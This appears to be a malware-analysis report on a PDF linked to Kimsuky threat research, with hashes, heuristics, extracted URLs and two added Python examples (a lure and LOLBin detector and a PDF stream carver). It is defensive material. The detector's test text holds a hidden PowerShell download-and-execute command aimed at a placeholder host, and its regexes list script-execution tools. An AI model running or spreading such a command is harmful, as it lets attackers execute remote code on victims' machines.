Malicious PDF — malware analysis report

Static analysis result for SHA-256 da7d584d69e037a5…

Verdict: MALICIOUS
File type: PDF
Size: 4.80 MB
Authoring application: Skia/PDF m120 Google Docs Renderer
First seen: 2023-11-20
MD5: 012932bdba4ac0313f09c30046f55611
SHA-1: 7c4e37e0a733b5e8f0f723cca2a9675901527dc4
SHA-256: da7d584d69e037a5b3cf3ef90fd5304bbaac72c0d78a99484def8a081b373f10
Risk score: 84

Machine Learning

  • Nyx PDF Classifier: clean (score 0.0009)

Heuristics (4)

  • Clipboard command execution lure [high] SE_CLIPBOARD_COMMAND_LURE
    The document tells the user to copy or paste clipboard content into Run, PowerShell, cmd, or another shell-like execution context.
  • LOLBin token sequence in document text [high] SE_LOLBIN_RUN_COMMAND
    The extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, ...) within 220 characters of a dangerous flag, command verb, or URL. In HTML/PDF/RTF lure bodies this is a visible "run this" instruction; in macro-laden Office files it is the macro's own string-pool entries appearing adjacent to each other in the extracted text.
  • External URI [info] PDF_URI
    The PDF contains an external URL action.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • https://www.genians.co.kr (in PDF document text)
    • http://cainnick002.000webhostap (in PDF document text)
    • http://cainnick002.000webhostapp[.]com/nick/show.php?query=50 (in PDF document text)
    • https://www.genians.co.kr/products/genian-edr/ (in PDF document text)
    • https://gist.github.com/geoffgarside/c28816a48516794095b96dcc5944ad25 (in PDF document text)
    • https://www.genians.co.kr/products/genian-edr (in PDF document text)
    • https://www.genians.co.kr/blog/darkhorse (in PDF document text)
    • https://www.igloo.co.kr/security-information/2021%EB%85%84-%EC%83%81%EB%B0%98%EA%B8%B0-kimsuky-%EA%B3%B5%EA%B2%A9-%EB%8F%99%ED%96%A5/ (in PDF document text)
    • https://blog.alyac.co.kr/3033 (in PDF document text)
    • https://blog.alyac.co.kr/2299 (in PDF document text)
    • https://blog.alyac.co.kr/2243 (in PDF document text)
    • https://attack.mitre.org/tactics/enterprise/ (in PDF document text)
    • https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/3413621/us-rok-agencies-alert-dprk-cyber-actors-impersonating-targets-to-collect-intell/ (PDF link annotation)
    • https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/ (in PDF document text)
    • https://en.wikipedia.org/wiki/Terrorist_Tactics,_Techniques,_and_Procedures (in PDF document text)
    • https://malpedia.caad.fkie.fraunhofer.de/actor/kimsuky (in PDF document text)
    • https://en.wikipedia.org/wiki/Zoho_Corporation (in PDF document text)
    • https://www.cloudns.net/ (in PDF document text)
    • https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks (in PDF document text)
    • https://thorcert.notion.site/TTPs-9-f04ce99784874947978bd2947738ac92 (in PDF document text)
    • https://kr.sentinelone.com/wp-content/uploads/pdf-gen/1684815806/kimsuky-ongoing-campaign-using-tailored-reconnaissance-toolkit.pdf (in PDF document text)
    • https://dumah7.wordpress.com/2009/02/17/kel-chm-creator-v-1-4-0-0/ (in PDF document text)
    • https://ericzimmerman.github.io/#!index.md (in PDF document text)
    • https://learn.microsoft.com/ko-kr/windows/win32/amsi/antimalware-scan-interface-portal (in PDF document text)
    • https://attack.mitre.org/techniques/T1598/002/ (in PDF document text)
    • https://attack.mitre.org/techniques/T1598/003/ (in PDF document text)
    • https://attack.mitre.org/techniques/T1585/002/ (in PDF document text)
    • https://attack.mitre.org/techniques/T1566/002/ (in PDF document text)
    • https://attack.mitre.org/techniques/T1566/003/ (in PDF document text)
    • https://attack.mitre.org/techniques/T1059/001/ (in PDF document text)
    • https://attack.mitre.org/techniques/T1059/003/ (in PDF document text)
    • https://attack.mitre.org/software/S0414/ (in PDF document text)
    • https://attack.mitre.org/ (in PDF document text)
    • https://attack.mitre.org/techniques/T1059/005/ (in PDF document text)
    • https://attack.mitre.org/techniques/T1204/002/ (in PDF document text)
    • https://attack.mitre.org/techniques/T1547/001/ (in PDF document text)
    • https://attack.mitre.org/techniques/T1070/004/ (in PDF document text)
    • https://attack.mitre.org/techniques/T1140/ (in PDF document text)
    • https://attack.mitre.org/techniques/T1218/001/ (in PDF document text)
    • https://attack.mitre.org/techniques/T1057/ (in PDF document text)
    • https://attack.mitre.org/techniques/T1082/ (in PDF document text)
    • https://attack.mitre.org/techniques/T1083/ (in PDF document text)
    • https://attack.mitre.org/techniques/T1518/001/ (in PDF document text)
    • https://attack.mitre.org/techniques/T1071/001/ (in PDF document text)
    • https://attack.mitre.org/techniques/T1041/ (in PDF document text)
    • https://asec.ahnlab.com/ko/48960/ (in PDF document text)
    • https://medium.com/s2wblog/unveil-the-evolution-of-kimsuky-targeting-android-devices-with-newly-discovered-mobile-malware-280dae5a650f (in PDF document text)
    • https://asec.ahnlab.com/ko/34383/ (in PDF document text)
    • https://asec.ahnlab.com/ko/32685/ (in PDF document text)
    • https://asec.ahnlab.com/ko/31481/ (in PDF document text)
    (5 more URLs not shown)
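The two high-severity heuristics above are text-proximity rules, so their logic can be reproduced from the descriptions alone. What follows is an added example written for this page (this editor's code, not the scanner's implementation) that runs both rules over constructed sample text: the token lists, the regexes, the sentence splitting and the 220-character window are assumptions, and the sample lure text and the URL http://203.0.113.7/... in it are made up for the demonstration.

```python
import re

# Added example: a text-proximity re-implementation of the two "high" heuristics in
# the report, SE_LOLBIN_RUN_COMMAND and SE_CLIPBOARD_COMMAND_LURE. The token lists,
# the regexes and the 220-character window applied here are this example's own
# assumptions; the scanner's real rules are not published on the page.
WINDOW = 220

# Windows script/execution tool names ("LOLBins") matched as whole words.
LOLBIN_RE = re.compile(
    r"\b(?:powershell|pwsh|mshta|cmd(?:\.exe)?|rundll32|regsvr32|wscript|cscript|certutil|bitsadmin)\b",
    re.I,
)
# Dangerous flags, command verbs and URLs that turn a nearby tool name into a "run this" instruction.
DANGER_RE = re.compile(
    r"(?:-enc(?:odedcommand)?\b|-nop\b|-w(?:indowstyle)?\s+hidden\b|-ep\s+bypass\b"
    r"|\biex\b|\binvoke-expression\b|\bdownloadstring\b|\s/c\b|https?://\S+)",
    re.I,
)
# Clipboard verbs and shell-like execution contexts for the lure heuristic.
COPY_PASTE_RE = re.compile(r"\b(?:copy|copied|paste|pasted|clipboard|ctrl\s*\+\s*[cv])\b", re.I)
EXEC_CTX_RE = re.compile(
    r"\b(?:run\s+dialog|win(?:dows)?\s*\+\s*r|powershell|cmd|command\s+prompt|terminal)\b", re.I
)


def lolbin_run_command(text, window=WINDOW):
    """Return (tool, evidence, distance) triples for every tool name within
    `window` characters of a dangerous token. A token that merely contains the
    tool name (a docs URL ending in /powershell) is not counted as evidence."""
    dangers = list(DANGER_RE.finditer(text))
    hits = []
    for tool in LOLBIN_RE.finditer(text):
        for d in dangers:
            if d.start() < tool.end() and d.end() > tool.start():
                continue  # the tool name sits inside the URL/token itself
            gap = d.start() - tool.end() if d.start() >= tool.end() else tool.start() - d.end()
            if gap <= window:
                hits.append((tool.group(0), d.group(0), gap))
    return hits


def clipboard_command_lure(text):
    """Return the sentences that pair a copy/paste instruction with a
    shell-like execution context (Run dialog, PowerShell, cmd, ...)."""
    sentences = re.split(r"(?<=[.!?\n])\s+", text)
    return [s for s in sentences if COPY_PASTE_RE.search(s) and EXEC_CTX_RE.search(s)]


def evaluate(text):
    """Map heuristic IDs (labelled as in the report) to their evidence."""
    fired = {}
    lol = lolbin_run_command(text)
    if lol:
        fired["SE_LOLBIN_RUN_COMMAND"] = lol
    lure = clipboard_command_lure(text)
    if lure:
        fired["SE_CLIPBOARD_COMMAND_LURE"] = lure
    return fired


# Constructed sample inputs (not text extracted from the analysed sample).
SAMPLE_LURE = (
    "Your document could not be displayed.\n"
    "To fix this, press Win + R, paste the copied text with Ctrl+V and press Enter.\n"
    'powershell -w hidden -ep bypass -c "iex (iwr http://203.0.113.7/show.php?query=50)"\n'
)
SAMPLE_REPORT = (
    "Microsoft documents the interpreter at https://learn.microsoft.com/powershell "
    "and the vendor page lists no other tooling.\n"
)

if __name__ == "__main__":
    for name, sample in (("lure", SAMPLE_LURE), ("report", SAMPLE_REPORT)):
        print(name, evaluate(sample))
```

The overlap check matters in practice: a tool name that is part of a URL token (a documentation link ending in /powershell) is the most common benign near-miss, and it is skipped. The rule remains a proximity test on extracted text, so a document that quotes a command line, such as a threat write-up, fires it as readily as a lure does; read it alongside the classifier score and the carved artifacts rather than as a verdict on its own.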

Extracted artifacts (5)

Files carved from inside the sample during analysis.

stream_000_off00000238.bin
  Kind: decompressed-pdf-stream
  Source: PDF FlateDecoded stream at offset 0x238
  Size: 4194304 bytes
  SHA-256: 0b52394e43a06e855057f8231fc5292e0fa9577dbdf03abe4c73687bbfc96f47

stream_013_off0049ddbc.bin
  Kind: decompressed-pdf-stream
  Source: PDF FlateDecoded stream at offset 0x49DDBC
  Size: 293104 bytes
  SHA-256: 88f213fc9c87736ceea710cdfa495da27a9dac846cca9cf5091fd289c712bb22

font_01_sfnt_off004bbc00.bin
  Kind: pdf-font-stream
  Source: PDF embedded font (sfnt) at offset 0x4BBC00
  Size: 104208 bytes
  SHA-256: a578d40fd90f197319caedace197957b7fc904deaa60289b04dbb27d07c50297

font_02_sfnt_off004c5d58.bin
  Kind: pdf-font-stream
  Source: PDF embedded font (sfnt) at offset 0x4C5D58
  Size: 30100 bytes
  SHA-256: 71c0dd255160ae80ee5819487225feeb1e6b1c332f156c6c9aa7dc3365636d6f

font_03_sfnt_off004c8987.bin
  Kind: pdf-font-stream
  Source: PDF embedded font (sfnt) at offset 0x4C8987
  Size: 352760 bytes
  SHA-256: 44808c6ee191bec2cef6c2dd33c03e589e9f1b1d30a24bad47b4964ec44a66cc
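The artifact list above records FlateDecode streams by object offset, inflated size and SHA-256. As an added example (this editor's code, not the scanner's carver), the following inflates every /FlateDecode stream found in raw PDF bytes and emits the same fields, exercised against a constructed minimal PDF; the 4 MiB output cap, the object regex, the record layout and the sample content are this example's assumptions.

```python
import hashlib
import re
import zlib

# Added example: carve and inflate FlateDecode streams from raw PDF bytes, producing
# the same kind of record as the "Extracted artifacts" list (offset, size, SHA-256).
# This is not the scanner's own code; the 4 MiB output cap is an assumption.
MAX_OUTPUT = 4 * 1024 * 1024

# "<num> <gen> obj << ...dict... >> stream\n": the dictionary may nest "<< >>"
# (DecodeParms) but must not run past an "endobj" into the next object.
OBJ_STREAM_RE = re.compile(
    rb"(\d+)\s+(\d+)\s+obj\s*<<((?:(?!endobj).)*?)>>\s*stream\r?\n", re.S
)
# A direct /Length value; "/Length 5 0 R" (indirect reference) is deliberately not matched.
DIRECT_LENGTH_RE = re.compile(rb"/Length\s+(\d+)(?!\s+\d+\s+R)")


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def carve_flate_streams(data, max_output=MAX_OUTPUT):
    """Return one record per /FlateDecode stream in `data`.

    The object's byte offset is reported, the body is sliced by a direct /Length
    when present (otherwise up to the next 'endstream'), and inflation is
    tolerant: a truncated or trailing-garbage body still yields partial output.
    PNG/TIFF predictors declared in /DecodeParms are not undone here.
    """
    records = []
    for m in OBJ_STREAM_RE.finditer(data):
        obj_num, dictionary = int(m.group(1)), m.group(3)
        if b"/FlateDecode" not in dictionary:
            continue  # uncompressed or otherwise-encoded stream: not our target
        body_start = m.end()
        length = DIRECT_LENGTH_RE.search(dictionary)
        if length:
            body = data[body_start:body_start + int(length.group(1))]
        else:
            end = data.find(b"endstream", body_start)
            if end < 0:
                continue
            body = data[body_start:end]
            # strip the single EOL that precedes the 'endstream' keyword
            body = body[:-2] if body.endswith(b"\r\n") else body[:-1] if body.endswith(b"\n") else body
        d = zlib.decompressobj()
        try:
            out = d.decompress(body, max_output)
        except zlib.error as exc:
            records.append({"obj": obj_num, "offset": m.start(), "error": str(exc)})
            continue
        records.append({
            "obj": obj_num,
            "offset": m.start(),
            "raw_size": len(body),
            "size": len(out),
            "sha256": sha256_hex(out),
            "complete": d.eof,                  # zlib end-of-stream marker was reached
            "capped": bool(d.unconsumed_tail),  # stopped at max_output with input left over
            "data": out,
        })
    return records


# Constructed sample: a minimal PDF skeleton with one FlateDecode stream (obj 3)
# and one plain stream (obj 4) that must be skipped. Not the analysed sample.
SAMPLE_PAYLOAD = b"BT /F1 12 Tf 72 712 Td (constructed page content) Tj ET\n" * 40


def build_sample_pdf(payload):
    comp = zlib.compress(payload)
    return (
        b"%PDF-1.7\n"
        b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
        b"2 0 obj\n<< /Type /Pages /Kids [] /Count 0 >>\nendobj\n"
        b"3 0 obj\n<< /Length " + str(len(comp)).encode() +
        b" /Filter /FlateDecode /DecodeParms << /Predictor 1 >> >>\nstream\n" + comp +
        b"\nendstream\nendobj\n"
        b"4 0 obj\n<< /Length 6 >>\nstream\nhello\n\nendstream\nendobj\n"
        b"%%EOF\n"
    )


if __name__ == "__main__":
    pdf = build_sample_pdf(SAMPLE_PAYLOAD)
    for rec in carve_flate_streams(pdf):
        print({k: v for k, v in rec.items() if k != "data"})
```

Two flags in the record are worth carrying over when reading a report like this one: `complete` is False when the zlib end-of-stream marker was never reached (a truncated or mislabelled stream), and `capped` is True when inflation stopped at the output limit. An artifact whose inflated size is exactly 4194304 bytes (4 MiB), as stream_000 above, is a round power of two, so re-inflate it without a cap before treating that figure as the stream's true length. Predictors declared in /DecodeParms are left in place, so inflated xref or image streams may still need predictor reversal before they are readable.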